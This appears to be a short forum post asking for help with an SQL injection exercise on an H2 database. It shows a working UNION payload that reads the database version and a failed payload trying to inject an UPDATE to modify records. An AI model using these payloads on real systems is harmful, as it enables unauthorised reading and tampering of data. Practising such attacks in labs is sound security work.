I need help with an sqli exercise. I used sqlmap to find a UNION vulnerability.
I managed to get the H2 version with this payload:
string') UNION ALL SELECT NULL,H2VERSION(),NULL,NULL,NULL--
But I would like to modify the database. I tried with this payload:
string') UNION ALL SELECT NULL,UPDATE ITEMS SET NAME = 'Hello' WHERE ID = 2,NULL,NULL,NULL--
But it did not work. Any ideas?